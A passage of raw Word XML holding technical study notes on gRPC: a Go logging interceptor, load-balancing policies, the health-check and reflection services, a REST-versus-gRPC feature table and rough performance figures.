        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D7A83D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    start := time.Now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E113E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    resp, err := handler(ctx, req)  // Call the actual handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C82C46" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    duration := time.Since(start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41574E79" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6A5804" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    log.Printf("Method: %s, Duration: %v, Error: %v", info.FullMethod, duration, err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BF660D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    return resp, err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BAB6F8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760A3569" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="00AFFDE0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Register interceptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB303F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>grpcServer := grpc.NewServer(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1466D1BC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc.UnaryInterceptor(loggingInterceptor),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4788C714" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654A236E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683E12A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305E1C0F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>gRPC supports client-side load balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2567364E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="039B136D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>1. Name resolution: resolve service name → list of backend addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F44DBD7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>2. LB policy: choose which backend to send each request to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB2BD7E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   - Round-robin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471C6450" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   - Pick-first (always use first available)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27412D3A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   - Weighted round-robin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A70CD96" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B99DC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>3. Or: external load balancer (Envoy, Linkerd, Istio).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9A4066" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC over HTTP/2 + L7 LB = per-request routing (not per-connection!).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA55ABA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24966AF6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Important: L4 (TCP) load balancing doesn't work well for gRPC because</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39922D98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC multiplexes many requests on ONE long-lived connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EBEBF9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   L4 LB routes the connection to one backend → all requests go there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C87B6F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Need L7 (HTTP/2-aware) LB for per-request distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56343235" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reflection and health checking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B76EFD9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDC3472" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Standard health check service (built into gRPC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D4C05E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>service Health {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE4D6E0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  rpc Check(HealthCheckRequest) returns (HealthCheckResponse);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18142B9D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc Watch(HealthCheckRequest) returns (stream HealthCheckResponse);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D9F083" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BECC08F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="04A4082B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Reflection: allows tools (grpcurl, grpc-web UI) to discover available services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA0169" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// without having the .proto files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D74DDED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="609B8ECC">
          <v:rect id="_x0000_i6533" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0772C390" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. REST vs. gRPC — Detailed Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C52588" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Feature Comparison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32"/>
        <w:gridCol w:w="3559"/>
        <w:gridCol w:w="3659"/>
      </w:tblGrid>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="6B716ED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3DB16B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aspect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CC15A3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>REST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66D7CC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>gRPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="4EE33B2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B55397" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Transport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54B7E0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>HTTP/1.1 (or HTTP/2)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1ED522" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>HTTP/2 (mandatory)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="4555E34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6099FC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Serialization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004471" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>JSON (text, human-readable)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4E9278" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Protobuf (binary, compact)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="27C0492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FC1067" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Contract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0E0674" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Informal (OpenAPI/Swagger optional)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1A4B1C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Formal (.proto file, code-generated)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="6B2EE72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C2BE00" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Browser support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FFCA42" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Native (any browser)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FF3206" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Limited (needs grpc-web proxy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="4109734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675868" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Streaming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B743F4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Limited (SSE, WebSocket separate)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B6CDFF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Native (4 patterns built-in)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="41B49C1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990546" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Code generation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6C2006" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Optional (OpenAPI codegen)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157EF7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Mandatory (protoc)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="470975F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D476A5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Tooling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D86771" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>curl, Postman, browser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05292D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>grpcurl, grpc-web, BloomRPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="32210F7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007886" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Caching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1C920F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Built into HTTP (Cache-Control, ETag)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1C1A12" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>No built-in caching (must implement)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="4F7CD30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5B036D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Human readability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9F331A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>High (JSON, text URLs)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7869BA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Low (binary, requires tools)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="2CE2586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B8477A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:lastRenderedPageBreak/>
              <w:t>Type safety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9AD2EF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>None at transport level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9AFCD5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Strong (proto schema enforced)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="5316FFD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66969B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Backwards compat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AC5F59" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Informal (semver, URL versioning)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D2A529" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Formal (field numbers, additive changes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="37178B8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61D52A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Ecosystem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3B81FA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Universal (every language, every tool)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F625DF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Growing (all major languages, less tooling)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D5026F0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Performance Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F292D1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7164C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Serialization size (same payload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1F2832" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON:     ~100 bytes (text, field names, quotes, brackets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7255BDAF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf: ~35 bytes (binary, field tags, no names)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5AD344" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Savings:  ~65% smaller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D67B8BC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="6F26E6C0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Serialization speed (per operation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426F4784" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON serialize:   ~10 μs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42175EDB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf serialize: ~1–2 μs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159ED17A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Speed: ~5–10x faster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D6E79A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="377FADDA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Network round trips (HTTP/1.1 vs HTTP/2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383D52CC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  REST (HTTP/1.1): 1 connection per request (or keep-alive with HOL blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239E2458" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  gRPC (HTTP/2): Multiple requests on 1 connection (multiplexed, no HOL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4FB58" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5F8B1B5C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Latency (service-to-service, same datacenter):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A581B1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  REST/JSON:  ~1–5ms (serialize + network + deserialize)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D6B5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  gRPC/Proto: ~0.5–2ms (faster serialize + smaller payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBCEFF4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="614E58AD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Throughput (single connection):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ACDA90" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
